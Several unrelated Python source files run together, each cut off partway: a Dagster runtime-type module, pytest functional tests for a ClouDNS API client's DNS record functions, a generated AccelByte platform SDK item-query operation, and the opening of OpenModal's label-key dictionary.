be None.') class PythonObjectType(RuntimeType): def __init__( self, python_type=None, key=None, name=None, typecheck_metadata_fn=None, type_check=None, **kwargs ): name = check.opt_str_param(name, 'name', type(self).__name__) key = check.opt_str_param(key, 'key', name) super(PythonObjectType, self).__init__(key=key, name=name, **kwargs) self.python_type = check.type_param(python_type, 'python_type') self.typecheck_metadata_fn = check.opt_callable_param( typecheck_metadata_fn, 'typecheck_metadata_fn' ) self._user_type_check = check.opt_callable_param(type_check, 'type_check') def type_check(self, value): from dagster.core.definitions.events import Failure if self._user_type_check is not None: self._user_type_check(value) elif not isinstance(value, self.python_type): raise Failure( 'Value of type {value_type} failed type check for Dagster type {dagster_type}, ' 'expected value to be of Python type {expected_type}.'.format( value_type=type(value), dagster_type=self.name, expected_type=self.python_type.__name__, ) ) if self.typecheck_metadata_fn: return self.typecheck_metadata_fn(value) PYTHON_DAGSTER_TYPE_ARGS_DOCSTRING = '''Args: python_type (cls): The python type to wrap as a Dagster type. name (Optional[str]): Name of the new Dagster type. If None, the name (__name__) of the python_type will be used. Default: None description (Optional[str]): A user-readable description of the type. Default: None. input_hydration_config (Optional[InputHydrationConfig]): An instance of a class that inherits from :py:class:`InputHydrationConfig <dagster.InputHydrationConfig>` and can map config data to a value of this type. Specify this argument if you will need to shim values of this type using the config machinery. As a rule, you should use the :py:func:`@input_hydration_config <dagster.InputHydrationConfig>` decorator to construct these arguments. Default: None output_materialization_config (Optiona[OutputMaterializationConfig]): An instance of a class that inherits from :py:class:`OutputMaterializationConfig <dagster.OutputMaterializationConfig>` that can persist values of this type. As a rule, you should use the :py:func:`@output_materialization_config <dagster.output_materialization_config>` decorator to construct these arguments. Default: None serialization_strategy (Optional[SerializationStrategy]): An instance of a class that inherits from :py:class:`SerializationStrategy <dagster.SerializationStrategy>`. The default strategy for serializing this value when automatically persisting it between execution steps. You should set this value if the ordinary serialization machinery (e.g., pickle) will not be adequate for this type. Default: None. auto_plugins (Optional[List[TypeStoragePlugin]]): If types must be serialized differently depending on the storage being used for intermediates, they should specify this argument. In these cases the serialization_strategy argument is not sufficient because serialization requires specialized API calls, e.g. to call an s3 API directly instead of using a generic file object. See dagster_pyspark.DataFrame for an example using auto_plugins. Default: None. typecheck_metadata_fn (Optional[Callable[[Any], TypeCheck]]): If specified, this function will be called to emit metadata when you successfully check a type. The typecheck_metadata_fn will be passed the value being type-checked and should return an instance of :py:class:`TypeCheck <dagster.TypeCheck>`. See dagster_pandas.DataFrame for an example. Default: None. type_check (Optional[Callable[[Any], Any]]): If specified, this function will be called in place of the default isinstance type check. This function should raise Failure if the type check fails, and otherwise pass. Its return value will be ignored.''' def define_python_dagster_type( python_type, name=None, description=None, input_hydration_config=None, output_materialization_config=None, serialization_strategy=None, auto_plugins=None, typecheck_metadata_fn=None, type_check=None, ): '''Define a dagster type corresponding to an existing python type. It's very common to want to generate a dagster type corresponding to an existing Python type. Typically this is done using the @dagster_type decorator or using as_dagster_type, each of which defer to this function as a workhorse. Usage: DateTime = define_python_dagster_type(datetime.datetime, name='DateTime') {args_docstring} '''.format( args_docstring=PYTHON_DAGSTER_TYPE_ARGS_DOCSTRING ) check.type_param(python_type, 'python_type') check.opt_str_param(name, 'name', python_type.__name__) check.opt_str_param(description, 'description') check.opt_inst_param(input_hydration_config, 'input_hydration_config', InputHydrationConfig) check.opt_inst_param( output_materialization_config, 'output_materialization_config', OutputMaterializationConfig ) check.opt_inst_param( serialization_strategy, 'serialization_strategy', SerializationStrategy, default=PickleSerializationStrategy(), ) auto_plugins = check.opt_list_param(auto_plugins, 'auto_plugins', of_type=type) check.param_invariant( all(issubclass(auto_plugin_type, TypeStoragePlugin) for auto_plugin_type in auto_plugins), 'auto_plugins', ) check.opt_callable_param(typecheck_metadata_fn, 'typecheck_metadata_fn') check.opt_callable_param(type_check, 'type_check') class _ObjectType(PythonObjectType): def __init__(self): super(_ObjectType, self).__init__( python_type=python_type, name=name, description=description, input_hydration_config=input_hydration_config, output_materialization_config=output_materialization_config, serialization_strategy=serialization_strategy, auto_plugins=auto_plugins, typecheck_metadata_fn=typecheck_metadata_fn, type_check=type_check, ) return _ObjectType def _create_nullable_input_schema(inner_type): if not inner_type.input_hydration_config: return None nullable_type = ConfigNullable(inner_type.input_hydration_config.schema_type).inst() class _NullableSchema(InputHydrationConfig): @property def schema_type(self): return nullable_type def construct_from_config_value(self, context, config_value): if config_value is None: return None return inner_type.input_hydration_config.construct_from_config_value( context, config_value ) return _NullableSchema() class NullableType(RuntimeType): def __init__(self, inner_type): key = 'Optional.' + inner_type.key super(NullableType, self).__init__( key=key, name=None, input_hydration_config=_create_nullable_input_schema(inner_type) ) self.inner_type = inner_type @property def display_name(self): return self.inner_type.display_name + '?' def type_check(self, value): return None if value is None else self.inner_type.type_check(value) @property def is_nullable(self): return True @property def inner_types(self): return [self.inner_type] + self.inner_type.inner_types def _create_list_input_schema(inner_type): if not inner_type.input_hydration_config: return None list_type = ConfigList(inner_type.input_hydration_config.schema_type).inst() class _ListSchema(InputHydrationConfig): @property def schema_type(self): return list_type def construct_from_config_value(self, context, config_value): convert_item = partial( inner_type.input_hydration_config.construct_from_config_value, context ) return list(map(convert_item, config_value)) return _ListSchema() class ListType(RuntimeType): def __init__(self, inner_type): key = 'List.' + inner_type.key super(ListType, self).__init__( key=key, name=None, input_hydration_config=_create_list_input_schema(inner_type) ) self.inner_type = inner_type @property def display_name(self): return '[' + self.inner_type.display_name + ']' def type_check(self, value): from dagster.core.definitions.events import Failure if not isinstance(value, list): raise Failure('Value must be a list, got {value}'.format(value=value)) for item in value: self.inner_type.type_check(item) @property def is_list(self): return True @property def inner_types(self): return [self.inner_type] + self.inner_type.inner_types def Optional(inner_type): check.inst_param(inner_type, 'inner_type', RuntimeType) class _Nullable(NullableType): def __init__(self): super(_Nullable, self).__init__(inner_type) return _Nullable.inst() def List(inner_type): check.inst_param(inner_type, 'inner_type', RuntimeType) class _List(ListType): def __init__(self): super(_List, self).__init__(inner_type) return _List.inst() class Stringish(RuntimeType): def __init__(self, key=None, name=None, **kwargs): name = check.opt_str_param(name, 'name', type(self).__name__) key = check.opt_str_param(key, 'key', name) super(Stringish, self).__init__( key=key, name=name, input_hydration_config=BuiltinSchemas.STRING_INPUT, output_materialization_config=BuiltinSchemas.STRING_OUTPUT, **kwargs ) @property def is_scalar(self): return True def type_check(self, value): return _throw_if_not_string(value) _RUNTIME_MAP = { BuiltinEnum.ANY: Any.inst(), BuiltinEnum.BOOL: Bool.inst(), BuiltinEnum.FLOAT: Float.inst(), BuiltinEnum.INT: Int.inst(), BuiltinEnum.PATH: Path.inst(), BuiltinEnum.STRING: String.inst(), BuiltinEnum.NOTHING: Nothing.inst(), } def resolve_to_runtime_type(dagster_type): # circular dep from .mapping import remap_python_type from .python_dict import PythonDict, create_typed_runtime_dict from .python_set import PythonSet, create_typed_runtime_set from .python_tuple import PythonTuple, create_typed_tuple dagster_type = remap_python_type(dagster_type) # do not do in remap because this is runtime system only. if is_closed_python_dict_type(dagster_type): return create_typed_runtime_dict(dagster_type.__args__[0],
# -*- coding: utf-8 -*- # # name: test_record.py # author: <NAME> | Prestix Studio, LLC. # email: <EMAIL> # created on: 05/25/2019 # """ Functional tests for cloudns_api's record module. """ from pytest import raises from cloudns_api import record from cloudns_api.validation import ValidationError from .helpers import mock_get_request, mock_post_request ## # Record Tests @mock_get_request() def test_record_get_available_record_types_function(): """Record get_available_record_types function sends properly formated request.""" response = record.get_available_record_types('domain') assert response.success payload = response.payload assert payload['url'] == \ 'https://api.cloudns.net/dns/get-available-record-types.json' assert payload['params']['zone-type'] == 'domain' @mock_get_request() def test_record_get_available_record_types_catches_validation_errors(): """Record get_available_record_types function catches invalid record type.""" response = record.get_available_record_types('not-valid') assert not response.success assert response.json()['error'] == 'Validation error.' @mock_get_request() def test_record_get_available_ttls_function(): """Record get_available_ttls function sends properly formated request.""" response = record.list('example.com', host='ns1') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/records.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['host'] == 'ns1' @mock_get_request() def test_record_list_function(): """Record list function sends properly formated request.""" response = record.list('example.com', host='ns1') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/records.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['host'] == 'ns1' def test_generate_record_parameters_works_for_a_records(): """The generate_record_parameters function generates A record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='', record_type='A', record='10.10.10.10', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'A' assert payload['domain-name'] == 'example.com' assert payload['host'] == '' assert payload['record'] == '10.10.10.10' assert payload['ttl'] == 3600 def test_generate_record_parameters_catches_a_record_errors(): """The generate_record_parameters function catches A record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', host='', record_type='A', ttl=3600, record='not an ip address') def test_generate_record_parameters_works_for_aaaa_records(): """The generate_record_parameters function generates AAAA record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='', record_type='AAAA', record='fc00:db20:35b:7399::5', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'AAAA' assert payload['domain-name'] == 'example.com' assert payload['host'] == '' assert payload['record'] == 'fc00:db20:35b:7399::5' assert payload['ttl'] == 3600 def test_generate_record_parameters_catches_aaaa_record_errors(): """The generate_record_parameters function catches AAAA record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', host='', record_type='AAAA', ttl=3600, record='not an ip address') def test_generate_record_parameters_works_for_mx_records(): """The generate_record_parameters function generates MX record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='mx1', record_type='MX', record='mail.example.com', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'MX' assert payload['domain-name'] == 'example.com' assert payload['host'] == 'mx1' assert payload['record'] == 'mail.example.com' assert payload['ttl'] == 3600 def test_generate_record_parameters_catches_mx_record_errors(): """The generate_record_parameters function catches MX record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', host='mx1', record_type='MX', ttl=3600, record='not an hostname') def test_generate_record_parameters_works_for_cname_records(): """The generate_record_parameters function generates CNAME record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='www', record_type='CNAME', record='example.com', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'CNAME' assert payload['domain-name'] == 'example.com' assert payload['host'] == 'www' assert payload['record'] == 'example.com' assert payload['ttl'] == 3600 def test_generate_record_parameters_catches_cname_record_errors(): """The generate_record_parameters function catches CNAME record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', host='www', record_type='CNAME', ttl=3600, record='not an hostname') def test_generate_record_parameters_works_for_txt_records(): """The generate_record_parameters function generates TXT record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='', record_type='TXT', record='Anything goes...', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'TXT' assert payload['domain-name'] == 'example.com' assert payload['host'] == '' assert payload['record'] == 'Anything goes...' assert payload['ttl'] == 3600 def test_generate_record_parameters_works_for_spf_records(): """The generate_record_parameters function generates SPF record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='', record_type='SPF', record='Anything goes...', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'SPF' assert payload['domain-name'] == 'example.com' assert payload['host'] == '' assert payload['record'] == 'Anything goes...' assert payload['ttl'] == 3600 def test_generate_record_parameters_works_for_ns_records(): """The generate_record_parameters function generates NS record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='www', record_type='NS', record='example.com', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'NS' assert payload['domain-name'] == 'example.com' assert payload['host'] == 'www' assert payload['record'] == 'example.com' assert payload['ttl'] == 3600 def test_generate_record_parameters_catches_ns_record_errors(): """The generate_record_parameters function catches NS record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', host='www', record_type='NS', ttl=3600, record='not an hostname') def test_generate_record_parameters_works_for_srv_records(): """The generate_record_parameters function generates SRV record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='srv1', record_type='SRV', record='srv.example.org', priority=10, weight=10, ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'SRV' assert payload['domain-name'] == 'example.com' assert payload['host'] == 'srv1' assert payload['record'] == 'srv.example.org' assert payload['ttl'] == 3600 def test_generate_record_parameters_catches_srv_record_errors(): """The generate_record_parameters function catches SRV record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', host='srv', record_type='SRV', priority=10, weight=10, ttl=3600, record='not an hostname') def test_generate_record_parameters_works_for_wr_records(): """The generate_record_parameters function generates WR record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='', record_type='WR', redirect_type=301, record='https://example.org/path/', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'WR' assert payload['domain-name'] == 'example.com' assert payload['host'] == '' assert payload['record'] == 'https://example.org/path/' assert payload['ttl'] == 3600 def test_generate_record_parameters_works_for_alias_records(): """The generate_record_parameters function generates ALIAS record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='www', record_type='ALIAS', record='www.example.org', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'ALIAS' assert payload['domain-name'] == 'example.com' assert payload['host'] == 'www' assert payload['record'] == 'www.example.org' assert payload['ttl'] == 3600 def test_generate_record_parameters_catches_alias_record_errors(): """The generate_record_parameters function catches ALIAS record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', host='www', record_type='ALIAS', ttl=3600, record='not an hostname') def test_generate_record_parameters_works_for_rp_records(): """The generate_record_parameters function generates RP record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='', record_type='RP', record='<EMAIL>', ttl=3600) payload = parameters.to_dict() assert payload['record-type'] == 'RP' assert payload['domain-name'] == 'example.com' assert payload['host'] == '' assert payload['record'] == '<EMAIL>' assert payload['ttl'] == 3600 def test_generate_record_parameters_works_for_sshfp_records(): """The generate_record_parameters function generates SSHFP record parameters.""" parameters = record.generate_record_parameters( domain_name='example.com', host='www', record_type='SSHFP', record='the fingerprint...', ttl=3600, algorithm='RSA', fptype='SHA-256') payload = parameters.to_dict() assert payload['record-type'] == 'SSHFP' assert payload['domain-name'] == 'example.com' assert payload['host'] == 'www' assert payload['record'] == 'the fingerprint...' assert payload['ttl'] == 3600 def test_generate_record_parameters_catches_sshfp_record_errors(): """The generate_record_parameters function catches SSHFP record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', host='www', record_type='SSHFP', record='the fingerprint...', ttl=3600, algorithm='not an algorithm', fptype='SHA-356') def test_generate_record_parameters_checks_for_invalid_type(): """The generate_record_parameters function catches NS record errors.""" with raises(ValidationError): record.generate_record_parameters( domain_name='example.com', record_type='bad-type') @mock_post_request() def test_record_create_function(): """Record create function sends properly formated update request.""" response = record.create('example.com', host='', record_type='A', record='10.10.10.10', ttl=3600) assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/add-record.json' assert payload['params']['record-type'] == 'A' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['host'] == '' assert payload['params']['record'] == '10.10.10.10' assert payload['params']['ttl'] == 3600 @mock_post_request() def test_record_create_function_catches_validation_errors(): """Record create function catches validation errors.""" response = record.create('not a valid domain', host='', record_type='A', record='10.10.10.10', ttl=3600) assert not response.success assert response.json()['error'] == 'Validation error.' @mock_post_request() def test_record_transfer_function(): """Record transfer function sends properly formated get request.""" response = record.transfer('example.com', server='1.1.1.1') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/axfr-import.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['server'] == '1.1.1.1' @mock_get_request() def test_record_copy_function(): """Record copy function sends properly formated get request.""" response = record.copy('example.com', from_domain='example.net', delete_current_records=True) assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/copy-records.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['from-domain'] == 'example.net' assert payload['params']['delete-current-records'] == 1 @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) def test_record_get_function(): """Record get function sends properly formated get request.""" response = record.get('example.com', 1234) assert response.success payload = response.payload assert payload['type'] == 'A' assert payload['domain-name'] == 'example.com' assert payload['record-id'] == 1234 assert payload['host'] == 'ns1' assert payload['ttl'] == 3600 assert payload['record'] == '10.0.0.10' @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) def test_record_get_function_with_bad_record_id(): """Record get function sends properly formated error message when record_id does not exist.""" response = record.get('example.com', 5678) assert not response.success assert response.error == \ 'Record "5678" not found in "example.com" zone.' assert str(response.status_code) == '404' @mock_get_request() def test_record_export_function(): """Record export function sends properly formated get request.""" response = record.export('example.com') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/records-export.json' assert payload['params']['domain-name'] == 'example.com' @mock_get_request() def test_record_get_dynamic_url_function(): """Record get_dynamic_url function sends properly formated get request.""" response = record.get_dynamic_url('example.com', record_id=1234) assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/get-dynamic-url.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['record-id'] == 1234 @mock_post_request() def test_record_update_function(): """Record update function sends properly formated update request.""" response = record.update('example.com', record_id=1234, record_type='A', host='ns1', ttl=3600, record='10.0.0.10') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/mod-record.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['record-id'] == 1234 assert payload['params']['host'] == 'ns1' assert payload['params']['ttl'] == 3600 assert payload['params']['record'] == '10.0.0.10' @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) @mock_post_request() def test_record_update_function_can_figure_out_record_type(): """Record update function can figure out what record type a record is.""" response = record.update('example.com', record_id=1234, host='ns1', ttl=3600, record='10.0.0.10') assert response.success payload = response.payload assert payload['url'] == 'https://api.cloudns.net/dns/mod-record.json' assert payload['params']['domain-name'] == 'example.com' assert payload['params']['record-id'] == 1234 assert payload['params']['host'] == 'ns1' assert payload['params']['ttl'] == 3600 assert payload['params']['record'] == '10.0.0.10' @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) def test_record_update_function_with_bad_record_id(): """Record update function sends properly formated error message when record_id does not exist.""" response = record.update('example.com', record_id=5678, host='ns1', ttl=3600, record='10.0.0.10') assert not response.success assert response.error == \ 'Record "5678" not found in "example.com" zone.' assert str(response.status_code) == '404' @mock_get_request(payload={ 1234: { 'type': 'A', 'domain-name': 'example.com', 'record-id': 1234, 'host': 'ns1', 'ttl': 3600, 'record': '10.0.0.10', } }) @mock_post_request() def test_record_update_function_using_patch(): """Record update function sends properly formated update request when doing a patch update.""" response = record.update('example.com', record_id=1234, record='10.10.10.10', patch=True)
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved. # This is licensed software from AccelByte Inc, for limitations # and restrictions contact your company contract manager. # # Code generated. DO NOT EDIT! # template file: justice_py_sdk_codegen/__main__.py # pylint: disable=duplicate-code # pylint: disable=line-too-long # pylint: disable=missing-function-docstring # pylint: disable=missing-module-docstring # pylint: disable=too-many-arguments # pylint: disable=too-many-branches # pylint: disable=too-many-instance-attributes # pylint: disable=too-many-lines # pylint: disable=too-many-locals # pylint: disable=too-many-public-methods # pylint: disable=too-many-return-statements # pylint: disable=too-many-statements # pylint: disable=unused-import # justice-platform-service (4.10.0) from __future__ import annotations from typing import Any, Dict, List, Optional, Tuple, Union from .....core import Operation from .....core import HeaderStr from .....core import HttpResponse from .....core import StrEnum from ...models import ErrorEntity from ...models import FullItemPagingSlicedResult from ...models import ValidationErrorEntity class AppTypeEnum(StrEnum): DEMO = "DEMO" DLC = "DLC" GAME = "GAME" SOFTWARE = "SOFTWARE" class ItemTypeEnum(StrEnum): APP = "APP" BUNDLE = "BUNDLE" CODE = "CODE" COINS = "COINS" INGAMEITEM = "INGAMEITEM" MEDIA = "MEDIA" SEASON = "SEASON" SUBSCRIPTION = "SUBSCRIPTION" class SortByEnum(StrEnum): NAME = "name" NAME_ASC = "name:asc" NAME_DESC = "name:desc" CREATEDAT = "createdAt" CREATEDAT_ASC = "createdAt:asc" CREATEDAT_DESC = "createdAt:desc" UPDATEDAT = "updatedAt" UPDATEDAT_ASC = "updatedAt:asc" UPDATEDAT_DESC = "updatedAt:desc" DISPLAYORDER = "displayOrder" DISPLAYORDER_ASC = "displayOrder:asc" DISPLAYORDER_DESC = "displayOrder:desc" class QueryItems(Operation): """Query items by criteria (queryItems) This API is used to query items by criteria within a store. Other detail info: * Required permission : resource="ADMIN:NAMESPACE:{namespace}:ITEM", action=2 (READ) * Returns : the list of items Required Permission(s): - ADMIN:NAMESPACE:{namespace}:ITEM [READ] Properties: url: /platform/admin/namespaces/{namespace}/items/byCriteria method: GET tags: ["Item"] consumes: [] produces: ["application/json"] securities: [BEARER_AUTH] or [BEARER_AUTH] namespace: (namespace) REQUIRED str in path active_only: (activeOnly) OPTIONAL bool in query app_type: (appType) OPTIONAL Union[str, AppTypeEnum] in query available_date: (availableDate) OPTIONAL str in query base_app_id: (baseAppId) OPTIONAL str in query category_path: (categoryPath) OPTIONAL str in query features: (features) OPTIONAL str in query item_type: (itemType) OPTIONAL Union[str, ItemTypeEnum] in query limit: (limit) OPTIONAL int in query offset: (offset) OPTIONAL int in query region: (region) OPTIONAL str in query sort_by: (sortBy) OPTIONAL List[Union[str, SortByEnum]] in query store_id: (storeId) OPTIONAL str in query tags: (tags) OPTIONAL str in query target_namespace: (targetNamespace) OPTIONAL str in query Responses: 200: OK - FullItemPagingSlicedResult (successful operation) 404: Not Found - ErrorEntity (30141: Store [{storeId}] does not exist in namespace [{namespace}] | 30142: Published store does not exist in namespace [{namespace}]) 422: Unprocessable Entity - ValidationErrorEntity (20002: validation error) """ # region fields _url: str = "/platform/admin/namespaces/{namespace}/items/byCriteria" _method: str = "GET" _consumes: List[str] = [] _produces: List[str] = ["application/json"] _securities: List[List[str]] = [["BEARER_AUTH"], ["BEARER_AUTH"]] _location_query: str = None namespace: str # REQUIRED in [path] active_only: bool # OPTIONAL in [query] app_type: Union[str, AppTypeEnum] # OPTIONAL in [query] available_date: str # OPTIONAL in [query] base_app_id: str # OPTIONAL in [query] category_path: str # OPTIONAL in [query] features: str # OPTIONAL in [query] item_type: Union[str, ItemTypeEnum] # OPTIONAL in [query] limit: int # OPTIONAL in [query] offset: int # OPTIONAL in [query] region: str # OPTIONAL in [query] sort_by: List[Union[str, SortByEnum]] # OPTIONAL in [query] store_id: str # OPTIONAL in [query] tags: str # OPTIONAL in [query] target_namespace: str # OPTIONAL in [query] # endregion fields # region properties @property def url(self) -> str: return self._url @property def method(self) -> str: return self._method @property def consumes(self) -> List[str]: return self._consumes @property def produces(self) -> List[str]: return self._produces @property def securities(self) -> List[List[str]]: return self._securities @property def location_query(self) -> str: return self._location_query # endregion properties # region get methods # endregion get methods # region get_x_params methods def get_all_params(self) -> dict: return { "path": self.get_path_params(), "query": self.get_query_params(), } def get_path_params(self) -> dict: result = {} if hasattr(self, "namespace"): result["namespace"] = self.namespace return result def get_query_params(self) -> dict: result = {} if hasattr(self, "active_only"): result["activeOnly"] = self.active_only if hasattr(self, "app_type"): result["appType"] = self.app_type if hasattr(self, "available_date"): result["availableDate"] = self.available_date if hasattr(self, "base_app_id"): result["baseAppId"] = self.base_app_id if hasattr(self, "category_path"): result["categoryPath"] = self.category_path if hasattr(self, "features"): result["features"] = self.features if hasattr(self, "item_type"): result["itemType"] = self.item_type if hasattr(self, "limit"): result["limit"] = self.limit if hasattr(self, "offset"): result["offset"] = self.offset if hasattr(self, "region"): result["region"] = self.region if hasattr(self, "sort_by"): result["sortBy"] = self.sort_by if hasattr(self, "store_id"): result["storeId"] = self.store_id if hasattr(self, "tags"): result["tags"] = self.tags if hasattr(self, "target_namespace"): result["targetNamespace"] = self.target_namespace return result # endregion get_x_params methods # region is/has methods # endregion is/has methods # region with_x methods def with_namespace(self, value: str) -> QueryItems: self.namespace = value return self def with_active_only(self, value: bool) -> QueryItems: self.active_only = value return self def with_app_type(self, value: Union[str, AppTypeEnum]) -> QueryItems: self.app_type = value return self def with_available_date(self, value: str) -> QueryItems: self.available_date = value return self def with_base_app_id(self, value: str) -> QueryItems: self.base_app_id = value return self def with_category_path(self, value: str) -> QueryItems: self.category_path = value return self def with_features(self, value: str) -> QueryItems: self.features = value return self def with_item_type(self, value: Union[str, ItemTypeEnum]) -> QueryItems: self.item_type = value return self def with_limit(self, value: int) -> QueryItems: self.limit = value return self def with_offset(self, value: int) -> QueryItems: self.offset = value return self def with_region(self, value: str) -> QueryItems: self.region = value return self def with_sort_by(self, value: List[Union[str, SortByEnum]]) -> QueryItems: self.sort_by = value return self def with_store_id(self, value: str) -> QueryItems: self.store_id = value return self def with_tags(self, value: str) -> QueryItems: self.tags = value return self def with_target_namespace(self, value: str) -> QueryItems: self.target_namespace = value return self # endregion with_x methods # region to methods def to_dict(self, include_empty: bool = False) -> dict: result: dict = {} if hasattr(self, "namespace") and self.namespace: result["namespace"] = str(self.namespace) elif include_empty: result["namespace"] = "" if hasattr(self, "active_only") and self.active_only: result["activeOnly"] = bool(self.active_only) elif include_empty: result["activeOnly"] = False if hasattr(self, "app_type") and self.app_type: result["appType"] = str(self.app_type) elif include_empty: result["appType"] = Union[str, AppTypeEnum]() if hasattr(self, "available_date") and self.available_date: result["availableDate"] = str(self.available_date) elif include_empty: result["availableDate"] = "" if hasattr(self, "base_app_id") and self.base_app_id: result["baseAppId"] = str(self.base_app_id) elif include_empty: result["baseAppId"] = "" if hasattr(self, "category_path") and self.category_path: result["categoryPath"] = str(self.category_path) elif include_empty: result["categoryPath"] = "" if hasattr(self, "features") and self.features: result["features"] = str(self.features) elif include_empty: result["features"] = "" if hasattr(self, "item_type") and self.item_type: result["itemType"] = str(self.item_type) elif include_empty: result["itemType"] = Union[str, ItemTypeEnum]() if hasattr(self, "limit") and self.limit: result["limit"] = int(self.limit) elif include_empty: result["limit"] = 0 if hasattr(self, "offset") and self.offset: result["offset"] = int(self.offset) elif include_empty: result["offset"] = 0 if hasattr(self, "region") and self.region: result["region"] = str(self.region) elif include_empty: result["region"] = "" if hasattr(self, "sort_by") and self.sort_by: result["sortBy"] = [str(i0) for i0 in self.sort_by] elif include_empty: result["sortBy"] = [] if hasattr(self, "store_id") and self.store_id: result["storeId"] = str(self.store_id) elif include_empty: result["storeId"] = "" if hasattr(self, "tags") and self.tags: result["tags"] = str(self.tags) elif include_empty: result["tags"] = "" if hasattr(self, "target_namespace") and self.target_namespace: result["targetNamespace"] = str(self.target_namespace) elif include_empty: result["targetNamespace"] = "" return result # endregion to methods # region response methods # noinspection PyMethodMayBeStatic def parse_response(self, code: int, content_type: str, content: Any) -> Tuple[Union[None, FullItemPagingSlicedResult], Union[None, ErrorEntity, HttpResponse, ValidationErrorEntity]]: """Parse the given response. 200: OK - FullItemPagingSlicedResult (successful operation) 404: Not Found - ErrorEntity (30141: Store [{storeId}] does not exist in namespace [{namespace}] | 30142: Published store does not exist in namespace [{namespace}]) 422: Unprocessable Entity - ValidationErrorEntity (20002: validation error) ---: HttpResponse (Undocumented Response) ---: HttpResponse (Unexpected Content-Type Error) ---: HttpResponse (Unhandled Error) """ pre_processed_response, error = self.pre_process_response(code=code, content_type=content_type, content=content) if error is not None: return None, None if error.is_no_content() else error code, content_type, content = pre_processed_response if code == 200: return FullItemPagingSlicedResult.create_from_dict(content), None if code == 404: return None, ErrorEntity.create_from_dict(content) if code == 422: return None, ValidationErrorEntity.create_from_dict(content) return None, self.handle_undocumented_response(code=code, content_type=content_type, content=content) # endregion response methods # region static methods @classmethod def create( cls, namespace: str, active_only: Optional[bool] = None, app_type: Optional[Union[str, AppTypeEnum]] = None, available_date: Optional[str] = None, base_app_id: Optional[str] = None, category_path: Optional[str] = None, features: Optional[str] = None, item_type: Optional[Union[str, ItemTypeEnum]] = None, limit: Optional[int] = None, offset: Optional[int] = None, region: Optional[str] = None, sort_by: Optional[List[Union[str, SortByEnum]]] = None, store_id: Optional[str] = None, tags: Optional[str] = None, target_namespace: Optional[str] = None, ) -> QueryItems: instance = cls() instance.namespace = namespace
# Copyright (C) 2014-2017 <NAME>, <NAME>, <NAME>, <NAME> (in alphabetic order) # # This file is part of OpenModal. # # OpenModal is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 3 of the License. # # OpenModal is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with OpenModal. If not, see <http://www.gnu.org/licenses/>. """Module for handling keys used in OpenModal. Typical use: keys['abscissa_axis_units_lab']['3'] 'key': { '3': '', # acronym up to 3 characters '15': '', # short description up to 15 characters 'desc': '' # full description } """ keys = { 'abscissa_axis_units_lab': { '3': 'x', '15': 'x axis units', 'desc': 'label for the units on the abscissa', }, 'abscissa_force_unit_exp': { '3': 'exp', '15': 'unit exponent', 'desc': 'exponent for the force unit on the abscissa', }, 'abscissa_inc': { '3': 'inc', '15': 'x axis incr.', 'desc': 'abscissa increment; 0 if spacing uneven', }, 'abscissa_len_unit_exp': { '3': 